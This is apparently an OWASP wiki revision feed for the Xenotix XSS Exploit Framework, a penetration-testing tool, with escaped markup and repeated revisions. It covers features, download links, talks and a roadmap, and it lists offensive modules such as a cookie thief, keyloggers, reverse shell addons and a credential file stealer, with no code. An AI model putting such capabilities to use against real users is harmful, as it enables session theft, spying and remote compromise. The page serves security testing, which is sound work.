* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
* Xenotix is now available for Android Devices. [Download | http://m.xenotix.in]&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:ToolsWatch2013.png&amp;diff=188278</id>
		<title>File:ToolsWatch2013.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:ToolsWatch2013.png&amp;diff=188278"/>
				<updated>2015-01-20T08:25:12Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188146</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=188146"/>
				<updated>2015-01-15T05:05:30Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: /* Downloads */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:ToolsWatch2014.png |180px | thumb | left |link=http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2014]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Jan 2015] [http://www.toolswatch.org/2015/01/2014-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2014, voted by ToolsWatch Readers]&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
* Xenotix is now available for Android Devices. [Download | http://m.xenotix.in]&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
